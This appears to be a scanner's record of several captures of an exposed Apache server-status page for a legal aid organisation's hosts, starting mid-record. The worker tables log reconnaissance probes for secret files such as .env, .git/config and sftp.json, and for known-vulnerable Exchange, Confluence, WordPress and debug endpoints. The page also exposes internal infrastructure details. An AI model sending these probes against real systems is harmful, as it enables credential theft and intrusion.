130.176.137.97http/1.1events.alas.org:8080POST /wp-admin/admin-ajax.php?action=wp_1_wc_privacy_cleanup&no 10-188110047/45/151077K 2.39007.88.502219.12 15.158.40.169http/1.1elearning.alas.org:8080GET /v2/_catalog HTTP/1.1 11-188112158/36/127785K 7.060044.30.541932.72 15.158.40.169http/1.1secure.alas.org:8080GET /.git/config HTTP/1.1 12-188108121/43/124652K 7.7307891.00.631709.02 130.176.137.97http/1.1events.alas.org:8080POST /wp-cron.php?doing_wp_cron=1698336340.95940208435058593750 13-188-0/0/89673. 0.00198600.00.001217.13 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-188-0/0/76275. 0.00198400.00.00983.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-188-0/0/76493. 0.56469500.00.001027.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-188-0/0/63947. 0.00470000.00.00890.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-188-0/0/37502. 3.36317400.00.00517.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-188-0/0/29583. 0.00469900.00.00389.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-188-0/0/25767. 0.00470100.00.00412.15 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-188-0/0/25291. 0.00469800.00.00363.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-188-0/0/23405. 0.00469700.00.00379.84 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-188-0/0/23942. 6.80471400.00.00323.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-188-0/0/23865. 0.00469600.00.00333.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-188-0/0/21399. 5.77215000.00.00242.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-188-0/0/10775. 1.99398900.00.00183.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-188-0/0/9731. 0.00469200.00.00167.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-188-0/0/11027. 0.00469100.00.00152.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-188-0/0/8303. 0.00469000.00.00117.02 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-188-0/0/8081. 0.00468900.00.00123.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-188-0/0/8226. 0.00468800.00.00125.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-188-0/0/8185. 0.00469300.00.00112.15 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-188-0/0/9392. 7.16246000.00.00129.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-188-0/0/7961. 0.00468600.00.00128.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-188-0/0/7868. 0.00468700.00.0093.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-188-0/0/7228. 0.00468400.00.00100.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-188-0/0/7490. 1.34399200.00.00118.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-188-0/0/10355. 2.13391500.00.00123.49 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-188-0/0/7622. 0.00468500.00.0090.90 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-188-0/0/8122. 5.73198300.00.00116.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-188-0/0/6636. 0.91391400.00.0073.82 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-187-0/0/3822. 0.006446100.00.0036.78 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-187-0/0/4216. 0.006446000.00.0046.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-187-0/0/4000. 0.006445900.00.0028.11 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-187-0/0/1508. 0.006445800.00.0015.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-187-0/0/2386. 0.006445500.00.0031.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-187-0/0/1672. 0.006445700.00.0014.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-187-0/0/1625. 0.006445600.00.0028.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-187-0/0/2615. 0.006445400.00.0033.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-187-0/0/2455. 0.006445300.00.0024.98 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-187-0/0/2558. 0.006445200.00.0031.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-187-0/0/1314. 0.006445100.00.0017.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-187-0/0/1498. 0.006445000.00.0020.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-187-0/0/1626. 0.006444900.00.0021.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-187-0/0/1141. 0.006444800.00.0023.39 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-187-0/0/1176. 0.006444700.00.0012.15 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-187-0/0/1868. 0.006444600.00.0034.94 :
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea944fd8ff
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Thursday, 12-Oct-2023 00:03:20 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 174 Parent Server MPM Generation: 173 Server uptime: 173 days 8 hours 19 minutes 21 seconds Server load: 2.63 0.57 0.18 Total accesses: 2869837 - Total Traffic: 40.6 GB CPU Usage: u52.63 s9.29 cu0 cs0 - .000413% CPU load .192 requests/sec - 2913 B/second - 14.8 kB/request 102 requests currently being processed, 34 idle workers KWWKKWWWW_KKKKK_WKK_WWKKKKWK_K_WKKKWKWKWK_WWKKKWKKWKKKKK_KKWWK_W WKKKKWKWK__WKKKKWWKKKKKKWWKKKKKKKWWKKKWKKKKK.KWKC_______________ _________............. Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-1732827411/11/207944K 0.6404124.30.023020.18 15.158.40.169http/1.1esign.alas.org:8080GET /telescope/requests HTTP/1.1 1-173280084/28/202806W 1.6850235.30.643048.77 15.158.40.169http/1.1intranet.alas.org:8080GET /v2/_catalog HTTP/1.1 2-173282316/10/193266W 1.0850277.10.282925.37 15.158.40.169http/1.1events.alas.org:8080GET / HTTP/1.1 3-1732823815/18/192754K 1.410093.70.102785.50 15.158.40.169http/1.1short.alas.org:8080GET /.DS_Store HTTP/1.1 4-173281678/19/189272K 2.22065323.10.542738.84 15.158.40.169http/1.1survey.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 5-173271296/89/182603W 6.615047.42.032658.93 15.158.40.137http/1.1events.alas.org:8080GET / HTTP/1.1 6-173282396/8/173977W 1.8600238.70.242649.58 15.158.40.169http/1.1elearning.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 7-1732803510/28/175017W 1.3020282.90.352529.96 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 8-173280364/21/158525W 1.7620275.10.402531.52 15.158.40.169http/1.1intranet.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 9-173282790/7/156098_ 0.45227930.00.122027.58 15.158.40.169http/1.1elearning.alas.org:8080GET / HTTP/1.1 10-173281685/17/138956K 2.480042.30.242080.49 15.158.40.169http/1.1elearning.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 11-1732828010/10/119546K 0.130055.80.051807.14 15.158.40.169http/1.1short.alas.org:8080GET /.env HTTP/1.1 12-1732769714/59/114563K 3.010070.50.661606.26 15.158.40.169http/1.1short.alas.org:8080GET /login.action HTTP/1.1 13-173282898/8/83329K 0.090048.60.051118.03 15.158.40.169http/1.1short.alas.org:8080GET /telescope/requests HTTP/1.1 14-173282903/5/70270K 1.38003.30.32922.44 15.158.40.167http/1.1elearning.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 15-173282950/3/71095_ 0.56226040.00.10966.01 15.158.40.169http/1.1elearning.alas.org:8080GET / HTTP/1.1 16-173282966/6/58181W 0.100011.90.01820.15 15.158.40.169http/1.1survey.alas.org:8080GET / HTTP/1.1 17-173283096/6/33838K 0.330043.70.04465.86 15.158.40.169http/1.1elearning.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 18-173283106/6/24065K 0.17086551.40.05337.94 15.158.40.169http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 19-173283160/2/23458_ 0.69060990.00.09388.69 15.158.40.169http/1.1events.alas.org:8080GET / HTTP/1.1 20-173283174/4/23858W 0.55105.40.01343.40 15.158.40.169http/1.1intranet.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 21-173283222/2/21614W 0.57002.50.00352.10 15.158.40.169http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 22-173283245/5/22301K 0.23080015.10.01291.03 15.158.40.169http/1.1survey.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 23-173283286/6/19981K 0.960700241.50.24307.87 15.158.40.169http/1.1survey.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 24-173283299/9/19378K 0.540010.00.01221.26 15.158.40.169http/1.1elearning.alas.org:8080GET /v2/_catalog HTTP/1.1 25-173283502/2/9226K 0.57117.40.01167.37 15.158.40.169http/1.1short.alas.org:8080GET /server-status HTTP/1.1 26-173283515/5/9156W 0.010016.20.02158.77 15.158.40.169http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 27-173283551/1/10354K 0.56246831.00.00141.57 15.158.40.167http/1.1intranet.alas.org:8080GET / HTTP/1.1 28-173283570/1/7824_ 0.57150440.00.00108.15 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 29-173283582/2/7601K 0.55102.10.00116.48 15.158.40.167http/1.1elearning.alas.org:8080GET /s/7343e24393e2933323e28313/_/;/META-INF/maven/com.atlassia 30-173283590/3/7568_ 0.50019640.00.07119.59 15.158.40.169http/1.1elearning.alas.org:8080GET / HTTP/1.1 31-173283605/5/7173W 0.240036.30.0499.70 15.158.40.169http/1.1survey.alas.org:8080GET /server-status HTTP/1.1 32-173283615/5/7510K 0.370036.40.04113.98 15.158.40.169http/1.1elearning.alas.org:8080GET /v2/_catalog HTTP/1.1 33-173283625/5/7362K 0.34062046.90.05120.93 15.158.40.169http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 34-173283638/8/7199K 0.250040.90.0483.21 15.158.40.169http/1.1on.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 35-173283645/5/6605W 0.360042.60.0494.45 15.158.40.169http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 36-173283748/8/7038K 0.15009.70.01111.97 15.158.40.169http/1.1elearning.alas.org:8080GET /lib/editor/tiny/loader.php?rev=abc&filepath=hello.css HTTP 37-173283845/5/9948W 0.16107.70.01115.63 15.158.40.169http/1.1elearning.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 38-173283856/6/7041K 0.23186546.50.0584.89 15.158.40.137http/1.1survey.alas.org:8080GET / HTTP/1.1 39-173284128/8/7767W 0.030013.00.01112.21 15.158.40.137http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 40-173284133/3/6212K 0.56018.60.0167.85 15.158.40.169http/1.1short.alas.org:8080GET /server-status HTTP/1.1 41-173284300/2/3663_ 0.26226370.00.0335.03 15.158.40.167http/1.1elearning.alas.org:8080GET / HTTP/1.1 42-173284313/3/4083W 0.260035.50.0343.14 15.158.40.169http/1.1survey.alas.org:8080GET /server-status HTTP/1.1 43-173284320/0/2172W 0.00500.00.0019.08 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 44-173284354/4/1441K 0.15005.40.0114.61 15.158.40.169http/1.1short.alas.org:8080GET /v2/_catalog HTTP/1.1 45-173284387/7/2286K 0.150119.20.0229.78 15.158.40.169http/1.1on.alas.org:8080GET /server-status HTTP/1.1 46-173284396/6/1527K 0.120100448.00.0513.08 15.158.40.169http/1.1survey.alas.org:8080GET / HTTP/1.1 47-173284400/0/1391W 1.53500.00.0024.14 15.158.40.137http/1.1intranet.alas.org:8080GET / HTTP/1.1 48-173284415/5/2065K 0.150585.20.0130.27 15.158.40.167http/1.1esign.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 49-173284542/2/2274K 0.252033.20.0320.97 15.158.40.167http/1.1secure.alas.org:8080GET /_all_dbs HTTP/1.1 50-173284552/2/1235W 0.241033.20.0324.81 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 51-173284801/3/1231K 0.38115181.00.0316.60 15.158.40.167http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 52-173284817/7/1385K 0.090012.60.0118.47 15.158.4
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea13ce967e
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Thursday, 12-Oct-2023 00:03:20 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 174 Parent Server MPM Generation: 173 Server uptime: 173 days 8 hours 19 minutes 22 seconds Server load: 2.63 0.57 0.18 Total accesses: 2869846 - Total Traffic: 40.6 GB CPU Usage: u53.26 s9.39 cu0 cs0 - .000418% CPU load .192 requests/sec - 2913 B/second - 14.8 kB/request 101 requests currently being processed, 35 idle workers K_WKKWWWW_KKKKK_KKK_WWKKKWWK_K_WKKKWKWKKK_WWKKKWKKWKKKKK_KKWWK_W KKKKKWKWK__WKKKKWWKKKKKKWWKKKKKKKWWKKKWKKKKK.KWKC_______________ _________............. Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-1732827411/11/207944K 0.6404124.30.023020.18 15.158.40.169http/1.1esign.alas.org:8080GET /telescope/requests HTTP/1.1 1-173280080/29/202807_ 2.24054440.00.643048.77 15.158.40.169http/1.1intranet.alas.org:8080GET /v2/_catalog HTTP/1.1 2-173282316/10/193266W 1.0850277.10.282925.37 15.158.40.169http/1.1events.alas.org:8080GET / HTTP/1.1 3-1732823815/18/192754K 1.410093.70.102785.50 15.158.40.169http/1.1short.alas.org:8080GET /.DS_Store HTTP/1.1 4-173281678/19/189272K 2.22065323.10.542738.84 15.158.40.169http/1.1survey.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 5-173271296/89/182603W 6.615047.42.032658.93 15.158.40.137http/1.1events.alas.org:8080GET / HTTP/1.1 6-173282396/8/173977W 1.8610238.70.242649.58 15.158.40.169http/1.1elearning.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 7-1732803510/28/175017W 1.3020282.90.352529.96 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 8-173280364/21/158525W 1.7620275.10.402531.52 15.158.40.169http/1.1intranet.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 9-173282790/7/156098_ 0.45227930.00.122027.58 15.158.40.169http/1.1elearning.alas.org:8080GET / HTTP/1.1 10-173281685/17/138956K 2.480042.30.242080.49 15.158.40.169http/1.1elearning.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 11-1732828011/11/119547K 0.130056.80.061807.14 15.158.40.169http/1.1survey.alas.org:8080GET /.DS_Store HTTP/1.1 12-1732769714/59/114563K 3.010070.50.661606.26 15.158.40.169http/1.1short.alas.org:8080GET /login.action HTTP/1.1 13-173282898/8/83329K 0.091048.60.051118.03 15.158.40.169http/1.1short.alas.org:8080GET /telescope/requests HTTP/1.1 14-173282903/5/70270K 1.38003.30.32922.44 15.158.40.167http/1.1elearning.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 15-173282950/3/71095_ 0.56226040.00.10966.01 15.158.40.169http/1.1elearning.alas.org:8080GET / HTTP/1.1 16-173282967/7/58182K 0.19080253.30.05820.19 15.158.40.169http/1.1survey.alas.org:8080GET / HTTP/1.1 17-173283096/6/33838K 0.330043.70.04465.86 15.158.40.169http/1.1elearning.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 18-173283106/6/24065K 0.17186551.40.05337.94 15.158.40.169http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 19-173283160/2/23458_ 0.69060990.00.09388.69 15.158.40.169http/1.1events.alas.org:8080GET / HTTP/1.1 20-173283174/4/23858W 0.55205.40.01343.40 15.158.40.169http/1.1intranet.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 21-173283222/2/21614W 0.57102.50.00352.10 15.158.40.169http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 22-173283245/5/22301K 0.23080015.10.01291.03 15.158.40.169http/1.1survey.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 23-173283286/6/19981K 0.960700241.50.24307.87 15.158.40.169http/1.1survey.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 24-173283299/9/19378K 0.540010.00.01221.26 15.158.40.169http/1.1elearning.alas.org:8080GET /v2/_catalog HTTP/1.1 25-173283502/2/9226W 0.57007.40.01167.37 15.158.40.169http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 26-173283515/5/9156W 0.010016.20.02158.77 15.158.40.169http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 27-173283551/1/10354K 0.56246831.00.00141.57 15.158.40.167http/1.1intranet.alas.org:8080GET / HTTP/1.1 28-173283570/1/7824_ 0.57150440.00.00108.15 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 29-173283582/2/7601K 0.55202.10.00116.48 15.158.40.167http/1.1elearning.alas.org:8080GET /s/7343e24393e2933323e28313/_/;/META-INF/maven/com.atlassia 30-173283590/3/7568_ 0.50019640.00.07119.59 15.158.40.169http/1.1elearning.alas.org:8080GET / HTTP/1.1 31-173283605/5/7173W 0.240036.30.0499.70 15.158.40.169http/1.1survey.alas.org:8080GET /server-status HTTP/1.1 32-173283615/5/7510K 0.370036.40.04113.98 15.158.40.169http/1.1elearning.alas.org:8080GET /v2/_catalog HTTP/1.1 33-173283625/5/7362K 0.34162046.90.05120.93 15.158.40.169http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 34-173283638/8/7199K 0.250040.90.0483.21 15.158.40.169http/1.1on.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 35-173283645/5/6605W 0.360042.60.0494.45 15.158.40.169http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 36-173283749/9/7039K 0.150010.80.01111.97 15.158.40.169http/1.1short.alas.org:8080GET /s/7343e24393e2933323e28313/_/;/META-INF/maven/com.atlassia 37-173283845/5/9948W 0.16107.70.01115.63 15.158.40.169http/1.1elearning.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 38-173283856/6/7041K 0.23186546.50.0584.89 15.158.40.137http/1.1survey.alas.org:8080GET / HTTP/1.1 39-173284129/9/7768K 0.030119.50.02112.22 15.158.40.137http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 40-173284133/3/6212K 0.56018.60.0167.85 15.158.40.169http/1.1short.alas.org:8080GET /server-status HTTP/1.1 41-173284300/2/3663_ 0.26226370.00.0335.03 15.158.40.167http/1.1elearning.alas.org:8080GET / HTTP/1.1 42-173284313/3/4083W 0.260035.50.0343.14 15.158.40.169http/1.1survey.alas.org:8080GET /server-status HTTP/1.1 43-173284320/0/2172W 0.00500.00.0019.08 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 44-173284354/4/1441K 0.15105.40.0114.61 15.158.40.169http/1.1short.alas.org:8080GET /v2/_catalog HTTP/1.1 45-173284387/7/2286K 0.150119.20.0229.78 15.158.40.169http/1.1on.alas.org:8080GET /server-status HTTP/1.1 46-173284396/6/1527K 0.120100448.00.0513.08 15.158.40.169http/1.1survey.alas.org:8080GET / HTTP/1.1 47-173284400/0/1391W 1.53500.00.0024.14 15.158.40.137http/1.1intranet.alas.org:8080GET / HTTP/1.1 48-173284415/5/2065K 0.150585.20.0130.27 15.158.40.167http/1.1esign.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 49-173284542/2/2274K 0.252033.20.0320.97 15.158.40.167http/1.1secure.alas.org:8080GET /_all_dbs HTTP/1.1 50-173284552/2/1235W 0.242033.20.0324.81 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 51-173284801/3/1231K 0.38115181.00.0316.60 15.158.40.167http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 52-173284817/7/1385K 0.090012.60.0118.47 15.158.40
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93feaa3a75f64
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Thursday, 12-Oct-2023 00:03:18 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 174 Parent Server MPM Generation: 173 Server uptime: 173 days 8 hours 19 minutes 19 seconds Server load: 2.63 0.57 0.18 Total accesses: 2869724 - Total Traffic: 40.6 GB CPU Usage: u50.09 s8.88 cu0 cs0 - .000394% CPU load .192 requests/sec - 2913 B/second - 14.8 kB/request 107 requests currently being processed, 30 idle workers KWWKKWKWW_WKKKK_WKKWWKKKKKKKWKWKWKKKKWWKK_KWKKKWKKWWKKWK_KKWWKWK WKKKKWKKKWWWKKKKWWKKKKKKWKKKWKKKKWWKKKWKKKKK_KKW________________ _________............. Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-173282749/9/207942K 0.630121.00.023020.18 15.158.40.169http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 1-173280084/28/202806W 1.6830235.30.643048.77 15.158.40.169http/1.1intranet.alas.org:8080GET /v2/_catalog HTTP/1.1 2-173282316/10/193266W 1.0830277.10.282925.37 15.158.40.169http/1.1events.alas.org:8080GET / HTTP/1.1 3-1732823811/14/192750K 1.400089.40.092785.50 15.158.40.169http/1.1secure.alas.org:8080GET /telescope/requests HTTP/1.1 4-173281675/16/189269K 2.140119711.80.532738.83 15.158.40.169http/1.1survey.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 5-173271296/89/182603W 6.613047.42.032658.93 15.158.40.137http/1.1events.alas.org:8080GET / HTTP/1.1 6-173282396/8/173977K 1.86067238.70.242649.58 15.158.40.169http/1.1esign.alas.org:8080GET /login.action HTTP/1.1 7-1732803510/28/175017W 1.3000282.90.352529.96 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 8-173280364/21/158525W 1.7600275.10.402531.52 15.158.40.169http/1.1intranet.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 9-173282790/7/156098_ 0.45027930.00.122027.58 15.158.40.169http/1.1elearning.alas.org:8080GET / HTTP/1.1 10-173281683/15/138954W 2.400035.40.242080.48 15.158.40.169http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 11-173282807/7/119543K 0.130049.30.051807.13 15.158.40.169http/1.1elearning.alas.org:8080GET /.env HTTP/1.1 12-1732769710/55/114559K 3.000059.70.651606.25 15.158.40.169http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 13-173282897/7/83328K 0.090047.60.051118.03 15.158.40.169http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 14-173282902/4/70269K 1.38002.30.32922.44 15.158.40.167http/1.1secure.alas.org:8080GET /.env HTTP/1.1 15-173282950/3/71095_ 0.56026040.00.10966.01 15.158.40.169http/1.1elearning.alas.org:8080GET / HTTP/1.1 16-173282965/5/58180W 0.01006.00.01820.15 15.158.40.169http/1.1survey.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 17-173283094/4/33836K 0.320040.30.04465.86 15.158.40.169http/1.1elearning.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 18-173283105/5/24064K 0.100045.50.04337.93 15.158.40.169http/1.1elearning.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 19-173283161/1/23457W 0.00401.40.00388.61 15.158.40.169http/1.1events.alas.org:8080GET / HTTP/1.1 20-173283174/4/23858W 0.55005.40.01343.40 15.158.40.169http/1.1intranet.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 21-173283222/2/21614K 0.57046352.50.00352.10 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 22-173283244/4/22300K 0.16016519.10.01291.02 15.158.40.169http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 23-173283283/3/19978K 0.8801689233.60.23307.87 15.158.40.169http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 24-173283295/5/19374K 0.54005.50.01221.26 15.158.40.169http/1.1elearning.alas.org:8080GET /.DS_Store HTTP/1.1 25-173283501/1/9225K 0.57045911.00.00167.37 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 26-173283515/5/9156K 0.010116.20.02158.77 15.158.40.169http/1.1short.alas.org:8080GET /server-status HTTP/1.1 27-173283551/1/10354K 0.56046831.00.00141.57 15.158.40.167http/1.1intranet.alas.org:8080GET / HTTP/1.1 28-173283570/0/7823W 0.00400.00.00108.15 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 29-173283581/1/7600K 0.55038591.00.00116.48 15.158.40.167http/1.1intranet.alas.org:8080GET / HTTP/1.1 30-173283592/2/7567W 0.250034.40.03119.56 15.158.40.169http/1.1elearning.alas.org:8080GET / HTTP/1.1 31-173283604/4/7172K 0.240035.30.0399.70 15.158.40.169http/1.1short.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 32-173283613/3/7508W 0.240034.30.03113.97 15.158.40.169http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 33-173283624/4/7361K 0.26010241.10.04120.92 15.158.40.169http/1.1esign.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 34-173283635/5/7196K 0.250037.70.0483.21 15.158.40.169http/1.1on.alas.org:8080GET /s/630313e24393e2933323e28313/_/;/META-INF/maven/com.atlass 35-173283644/4/6604K 0.270036.80.0494.44 15.158.40.169http/1.1survey.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 36-173283745/5/7035K 0.13005.30.01111.96 15.158.40.169http/1.1elearning.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 37-173283844/4/9947W 0.15005.30.01115.63 15.158.40.169http/1.1esign.alas.org:8080GET /_all_dbs HTTP/1.1 38-173283855/5/7040W 0.13005.10.0084.85 15.158.40.137http/1.1survey.alas.org:8080GET / HTTP/1.1 39-173284127/7/7766K 0.030011.90.01112.21 15.158.40.137http/1.1on.alas.org:8080GET / HTTP/1.1 40-173284131/1/6210K 0.56045011.00.0067.85 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 41-173284300/2/3663_ 0.26026370.00.0335.03 15.158.40.167http/1.1elearning.alas.org:8080GET / HTTP/1.1 42-173284312/2/4082K 0.250033.20.0343.14 15.158.40.169http/1.1short.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 43-173284320/0/2172W 0.00300.00.0019.08 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 44-173284353/3/1440K 0.15004.30.0014.61 15.158.40.169http/1.1elearning.alas.org:8080GET /_all_dbs HTTP/1.1 45-173284383/3/2282K 0.150504.30.0029.77 15.158.40.169http/1.1esign.alas.org:8080GET /.DS_Store HTTP/1.1 46-173284394/4/1525K 0.00004.20.0013.03 15.158.40.169http/1.1short.alas.org:8080GET / HTTP/1.1 47-173284400/0/1391W 1.53300.00.0024.14 15.158.40.137http/1.1intranet.alas.org:8080GET / HTTP/1.1 48-173284414/4/2064K 0.13004.00.0030.27 15.158.40.167http/1.1secure.alas.org:8080GET /login.action HTTP/1.1 49-173284542/2/2274K 0.250033.20.0320.97 